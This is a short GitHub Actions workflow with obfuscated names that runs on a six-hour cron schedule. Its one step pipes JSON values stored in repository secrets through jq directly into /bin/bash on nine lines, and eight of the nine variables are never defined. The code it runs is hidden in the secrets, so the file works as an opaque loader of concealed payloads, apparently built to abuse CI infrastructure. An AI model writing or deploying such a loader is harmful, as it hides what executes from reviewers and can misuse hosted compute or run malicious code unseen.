name: huayindao7654

on:
  workflow_dispatch:
  schedule:
    - cron: '55 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huayindao7654
        env:
          yv9: ${{ secrets.yv9 }}
        run: |
          echo $yv9 | jq -r .jir5405 | /bin/bash
          echo $gh8 | jq -r .z679 | /bin/bash
          echo $omcc96856 | jq -r .evecg922 | /bin/bash
          echo $l6105 | jq -r .uvv06 | /bin/bash
          echo $ms02435 | jq -r .joj75150 | /bin/bash
          echo $h761 | jq -r .lpg998 | /bin/bash
          echo $gyam5 | jq -r .d90469 | /bin/bash
          echo $qrd467 | jq -r .hynwy5 | /bin/bash
          echo $x40233 | jq -r .oplmc872 | /bin/bash

